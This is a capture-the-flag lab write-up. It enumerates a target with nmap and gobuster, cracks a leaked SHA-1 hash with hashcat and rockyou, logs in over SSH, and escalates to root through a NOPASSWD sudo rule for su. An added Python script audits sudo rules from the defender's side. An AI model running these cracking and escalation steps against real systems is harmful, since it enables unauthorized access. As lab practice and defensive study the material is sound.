Final exam
Enumeration
nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCfc3f0BTiHCcXfM5HblbdICzdy1guzmd9N9m12TmOIFFFHdeHQbWjCnA38bbRtlJbvKUXcvQBqtV7UCeHLbcLGq27LeoxnNW6XeVlmXLqwu/hqJqVyi9PDp1U21NwtJz/MaF0nXhirp1MKcj94QZjRHMuvrywpw0jlJAD34OUufv6HT5a5eakO/QrSNTLgACV0AIn3Pb5/iC6bSOctj7+e5ndq5IcHuHaVtpjVV9gCF62xxTCN6hdQKF8KjWfWUEkEDRhgjKyENsLO1/XUNH0iTHsvOH8N3JN9z43067NBlX3sddciBl2HNwxlQEe8O8UC63yHvmx4M7agoyDYPwTF
| 256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH3QGzm8W9HuRYyoZkwHKkcVgJDlqnCU0s6Rt5fPp/Z34BYj4845B5la/2abdCyJ4zPUuOyS2OMAyJAFUm31kG0=
| 256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILs98AjzXfqGGqDneopePHJoBvde46uWWPJ4r7xfVv5p
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Gobuster
/.hta (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 11321]
/secret (Status: 301) [Size: 311] [--> http://10.10.49.52/secret/]
/server-status (Status: 403) [Size: 276]
/secret.txt (Status: 200) [Size: 46]
Go get tha secret.txt
file
nyan:046385855FC9580393853D8E81F240B66FE9A7B8
Old hash-id (haiti is better)
$hash-identifier
[hash-identifier v1.2 banner, by Zion3R, www.Blackploit.com]
--------------------------------------------------
HASH: 046385855FC9580393853D8E81F240B66FE9A7B8
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
hashcat -m 100 '046385855FC9580393853D8E81F240B66FE9A7B8' /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
046385855fc9580393853d8e81f240b66fe9a7b8:nyan
Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 046385855fc9580393853d8e81f240b66fe9a7b8
Time.Started.....: Sun Nov 7 01:33:01 2021 (4 secs)
Time.Estimated...: Sun Nov 7 01:33:05 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2195.6 kH/s (0.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4972544/14344385 (34.67%)
Rejected.........: 0/4972544 (0.00%)
Restore.Point....: 4970496/14344385 (34.65%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: nyasia. -> nwcfleshwound
Started: Sun Nov 7 01:32:31 2021
Stopped: Sun Nov 7 01:33:06 2021
So the credentials are nyan:nyan
boy..that meme feels so old now
$ssh nyan@10.10.57.168
The authenticity of host '10.10.57.168 (10.10.57.168)' can't be established.
ECDSA key fingerprint is SHA256:haqegvkQqmIEEzS0Mcd+NUsONboBQ6z3wQSwq+aj5Es.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.57.168' (ECDSA) to the list of known hosts.
nyan@10.10.57.168's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
- Documentation: https://help.ubuntu.com
- Management: https://landscape.canonical.com
- Support: https://ubuntu.com/advantage
Last login: Sat Dec 21 08:37:54 2019
nyan@ubuntu:~$
nyan@ubuntu:~$ cat user.txt
supernootnoot
God that guy is a meme machine
Privilege escalation
sudo -l
Matching Defaults entries for nyan on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nyan may run the following commands on ubuntu:
(root) NOPASSWD: /bin/su
LMAO
nyan@ubuntu:~$ sudo su
root@ubuntu:/home/nyan#
Fastest privileges ever
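A defender-side check for the sudo rule found above, as an added example that is not part of the original write-up: it parses `sudo -l` output and flags rules that let a user reach root through a shell-granting binary or an unrestricted command set. The function name `audit_sudo_l` and the `SHELL_EQUIVALENT` list are assumptions made for illustration.

```python
import re

# Constructed sample: the `sudo -l` output from this write-up, embedded inline.
SUDO_L = r"""Matching Defaults entries for nyan on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nyan may run the following commands on ubuntu:
    (root) NOPASSWD: /bin/su
"""

# Assumption: a short, non-exhaustive list of binaries that hand the caller a
# shell as the run-as user. Extend it for your own environment.
SHELL_EQUIVALENT = {"su", "sh", "bash", "dash", "zsh", "env", "sudo"}

# "(runas) TAG: TAG: cmd, cmd" as printed by `sudo -l`
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(text):
    """Return findings for rules that give root a shell or any command."""
    findings, in_rules = [], False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        runas = {u.strip() for u in m.group("runas").split(":")[0].split(",")}
        if not runas & {"root", "ALL"}:
            continue  # rule does not lead to root
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            binary = cmd.split()[0]
            if binary == "ALL":
                reasons = ["unrestricted command set"]
            elif binary.rsplit("/", 1)[-1] in SHELL_EQUIVALENT:
                reasons = [binary + " hands out a shell as the run-as user"]
            else:
                continue
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            findings.append({"command": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_l(SUDO_L):
        print(f["command"], "->", "; ".join(f["reasons"]))
```

Feed it the output of `sudo -l -U <user>` for each account during a host review; an empty list means no rule matched the assumed list, not that the sudoers policy is safe.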
root@ubuntu:~# cat root.txt
congratulations!!!!
Hands down straightforward!
7b304f3 @ 2024-11-15